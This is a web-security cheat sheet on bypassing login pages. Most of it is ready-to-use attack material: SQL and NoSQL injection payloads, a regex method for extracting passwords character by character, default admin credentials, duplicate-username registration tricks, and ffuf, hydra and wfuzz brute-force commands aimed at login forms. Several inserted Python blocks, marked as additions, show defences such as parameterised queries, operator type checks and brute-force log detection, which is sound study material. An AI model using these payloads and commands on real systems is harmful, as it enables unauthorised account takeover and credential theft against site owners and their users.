Exploit Notes

Web Login Bypass

Last modified: 2023-03-20

SQL Injections

admin' or '1'='1

Microsoft, Oracle, PostgreSQL

admin'--
admin' or 1=1--
admin' or '1'='1'--

admin}" or 1=1--

MySQL

admin'-- -
admin'#

admin' or 1=1#
admin' or 1=1-- -

admin' or '1'='1'-- -
admin' or '1'='1'#

admin}" or 1=1-- -
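
To see why the payloads above change the outcome of a login check, here is an added example (not from the original notes) that builds a constructed SQLite user table and compares a string-concatenated query with the same query using bound parameters; `login_vulnerable` and `login_safe` are hypothetical names.

```python
import sqlite3

# Constructed in-memory database standing in for the application's user table.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.executemany("INSERT INTO users VALUES (?, ?)",
               [("admin", "s3cret!"), ("john", "hunter2")])


def login_vulnerable(username, password):
    """Builds the WHERE clause by string concatenation, so a quote followed by
    'or ...' or a comment marker (--) in the input rewrites the query itself."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Same query with bound parameters: the input is only ever data, so
    admin'-- is compared literally against the username column and matches nothing."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None
```

The `#` comment variants listed under MySQL are not SQLite syntax and raise `sqlite3.OperationalError` here, which illustrates why the notes group the payloads by database engine.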

NoSQL Injection

Mongo

admin' || 1==1//
admin' || 1==1%00
admin' || '1==1
admin' || '1'=='1

  • Operators

    # $ne: Not equal
    username[$ne]=xyz&password[$ne]=xyz
    
    # $regex: Regular expressions
    username[$regex]=.*&password[$regex]=.*
    username[$regex]=^xyz&password[$regex]=^xyz
    username[$regex]=^a.*$&password[$ne]=xyz
    username[$regex]=.{6}&password[$ne]=xyz
    username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values
    
    # $exists: Exists in the database
    username[$exists]=true&password[$exists]=true
    
    # $nin: Not in (exclude values)
    username[$nin][admin]=admin&password[$ne]=xyz
    # If we find that "admin" exists, we can exclude it with the $nin operator.
    username[$nin][]=admin&password[$ne]=xyz
    # If more users are found, we can exclude them as well.
    username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz
    
    # $gt: Greater than
    username[$gt]=s&password[$gt]=s
    # $lt: Less than
    username[$lt]=s&password[$lt]=s
    
    # Combinations
    username[$ne]=xyz&password[$regex]=.*
    username[$exists]=true&password[$ne]=xyz
    username[$ne]=xyz&password[$exists]=true
    username[$regex]=.*&password[$ne]=xyz
    username[$ne]=xyz&password[$regex]=.*
    username[$regex]=.{6}&password[$ne]=xyz
    

    After finding usernames, we can also obtain the passwords using the “$regex” operator, as in the following example.

    # Check whether the password length is 7 characters.
    username=admin&password[$regex]=^.{7}$
    # If not, change 7 to 6 (or 8, or another number).
    username=admin&password[$regex]=^.{6}$
    # Once the length turns out to be 6, brute force the characters one by one.
    username=admin&password[$regex]=^a.....$
    username=admin&password[$regex]=^s.....$
    username=admin&password[$regex]=^se....$
    username=admin&password[$regex]=^sec...$
    
  • Operators in Json

    If the above payloads are not working, try changing to a JSON format.
    We also need to set the Content-Type to “application/json” in the HTTP header.

    Content-Type: application/json
    
    {"username": { "$ne": "xyz" }, "password": { "$ne": "xyz" }}
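
The following is an added example (not part of the original notes) showing how the form-encoded and JSON payloads above end up as operator objects in the query, and the check that stops them. It is written in Python with constructed data; `parse_form`, `matches`, `find_one_vulnerable` and `find_one_safe` are hypothetical names, and `matches` implements only the $ne and $regex subset of MongoDB matching needed to show the effect.

```python
import re
from urllib.parse import parse_qsl

# Constructed in-memory user list standing in for a MongoDB collection.
USERS = [
    {"username": "admin", "password": "s3cret!"},
    {"username": "john", "password": "hunter2"},
]


def parse_form(body):
    """Parse a form body the way 'extended' query-string parsers do:
    'username[$ne]=xyz' becomes {'username': {'$ne': 'xyz'}}, the same shape
    json.loads gives for the JSON variant (one level of brackets only)."""
    parsed = {}
    for key, value in parse_qsl(body):
        m = re.fullmatch(r"(\w+)\[([^\]]+)\]", key)
        if m:
            parsed.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            parsed[key] = value
    return parsed


def matches(cond, actual):
    """Tiny subset of MongoDB matching: equality plus the $ne and $regex operators."""
    if not isinstance(cond, dict):
        return cond == actual
    for op, arg in cond.items():
        if op == "$ne" and actual == arg:
            return False
        if op == "$regex" and re.search(arg, actual) is None:
            return False
        if op not in ("$ne", "$regex"):
            raise ValueError("unsupported operator " + op)
    return True


def find_one_vulnerable(query):
    """Hands the parsed body straight to the 'driver', so operator objects are honoured."""
    for user in USERS:
        if all(matches(query.get(f), user[f]) for f in ("username", "password")):
            return user["username"]
    return None


def find_one_safe(query):
    """Hardened: both credentials must be plain strings, so only equality is possible."""
    for field in ("username", "password"):
        if not isinstance(query.get(field), str):
            raise ValueError(field + " must be a string, not an operator object")
    return find_one_vulnerable(query)
```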
    

Default Credentials

admin:admin
admin:password
admin:password1
admin:password123
administrator:password
administrator:password1
administrator:password123

# phpIPAM
admin:ipamadmin
Admin:ipamadmin

# PHPMyAdmin
root:(null)
root:password

Wildcard Brute Force

If logging in with a wildcard (*) is allowed, you may be able to find the username/password with brute force.

username = *
password = *

For example, in Turbo Intruder (Burp Suite), attempt logins with alphanumeric characters one by one.

username=%s*&password=*
# or
username=*&password=%s*

My favorite wordlist for it is from SecLists:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case-extra.txt


Registration as Existing User

If we know existing users in the target website, we might be able to register the same username as the existing user. For example, assume we know “admin” user exists in the website.

Try to register with a username such as the following.

admin
admin%00
# Put a space before the username
 admin

If we can register the same username, we can log in and see the information about the user.
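
The registration variants above all rely on the uniqueness check comparing the raw submitted string. As an added example (not from the original notes), the check below canonicalises the username first; it goes slightly beyond the three cases listed by also applying NFKC normalisation and case folding, and `canonical_username`, `is_available` and the `EXISTING` set are constructed for illustration.

```python
import unicodedata

# Constructed set of already registered accounts; a real check queries the user store.
EXISTING = {"admin", "john"}


def canonical_username(raw):
    """Reduce a submitted username to the form that is stored and compared on.
    Null bytes (admin%00 after URL decoding) and other control characters are
    rejected outright rather than silently dropped, surrounding whitespace is
    trimmed, and the name is NFKC-normalised and case-folded so that look-alike
    spellings of an existing account collide with it."""
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in raw):
        raise ValueError("control characters are not allowed in usernames")
    name = unicodedata.normalize("NFKC", raw).strip().casefold()
    if not name:
        raise ValueError("username is empty after normalisation")
    return name


def is_available(raw):
    """Uniqueness check applied to the canonical form, not to the raw input."""
    return canonical_username(raw) not in EXISTING
```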


Brute Force Credentials

Before brute forcing, we need wordlists.

  • Rockyou

  • SecLists

  • CeWL

    Generate the custom wordlist from the target web page.

    cewl https://vulnerable.com > scraped_words.txt
    

Ffuf

# -fc: Filter HTTP status code
ffuf -w passwords -X POST -d "username=admin&password=FUZZ" -u http://vulnerable.com/login -fc 401

# Basic Auth
ffuf -u https://admin:FUZZ@example.com/ -w wordlist.txt -fc 401

Hydra

# Cracking username
hydra -L usernames.txt -p password vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
# Cracking password
hydra -l username -P passwords.txt vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid password"

# HTTPS (https-post-form)
hydra -L usernames.txt -P passwords.txt vulnerable.com https-post-form "/login:username=^USER^&password=^PASS^:Username or password is incorrect"


# Brute forcing HTTP Basic authentication (Authorization / WWW-Authenticate headers).
hydra -L usernames.txt -P passwords.txt <target-ip> http-get

Wfuzz

# Cracking username
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" https://example.com/login
# Cracking password
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" https://example.com/login

# Range: 00-99 -> "password00", "password01", ..., "password99"
# -t: N threads
# -s: delay of N seconds between requests
wfuzz -z range,00-99 -d "username=admin&password=passwordFUZZ&submit=Submit" -X POST -u https://example.com/login -t 1 -s 20

# -- Options --------------------------------------------------------------------------------------------

# --hc: Hide the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --hc 302 http://example.com/login
# --hh: Hide the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --hh 783 http://example.com/login

# --sc: Show the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --sc 302 http://example.com/login
# --sh: Show the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --sh 1214 http://example.com/login
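
The tools above produce a burst of identical login failures (the same status code and the same response length the attacker filters on with -fc/--hh) followed, if a guess succeeds, by a different response. As an added example (not part of the original notes), the detector below runs that logic over a constructed access log in combined format; `ACCESS_LOG`, `login_attempts` and `flag_brute_force` are constructed for illustration.

```python
import re
from collections import Counter

# Constructed web-server access log in combined format; not from a real host.
ACCESS_LOG = """\
10.0.0.5 - - [20/Mar/2023:10:00:01 +0000] "POST /login HTTP/1.1" 401 783 "-" "curl/7.88"
10.0.0.5 - - [20/Mar/2023:10:00:01 +0000] "POST /login HTTP/1.1" 401 783 "-" "curl/7.88"
10.0.0.5 - - [20/Mar/2023:10:00:02 +0000] "POST /login HTTP/1.1" 401 783 "-" "curl/7.88"
10.0.0.5 - - [20/Mar/2023:10:00:02 +0000] "POST /login HTTP/1.1" 401 783 "-" "curl/7.88"
10.0.0.5 - - [20/Mar/2023:10:00:03 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/7.88"
10.0.0.9 - - [20/Mar/2023:10:00:05 +0000] "POST /login HTTP/1.1" 401 783 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Mar/2023:10:00:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client ip, method, path, status, response size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def login_attempts(log_text, path="/login"):
    """Yield (ip, status) for every POST to the login endpoint."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(2) == "POST" and m.group(3) == path:
            yield m.group(1), int(m.group(4))


def flag_brute_force(log_text, threshold=3):
    """Return {ip: (failures, success_after_burst)} for every IP whose count of
    401/403 login responses reaches the threshold. A success (302 here) that
    follows such a burst is the case a defender should look at first."""
    failures, success_after = Counter(), {}
    for ip, status in login_attempts(log_text):
        if status in (401, 403):
            failures[ip] += 1
        elif status in (200, 302) and failures[ip] >= threshold:
            success_after[ip] = True
    return {ip: (n, success_after.get(ip, False))
            for ip, n in failures.items() if n >= threshold}
```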
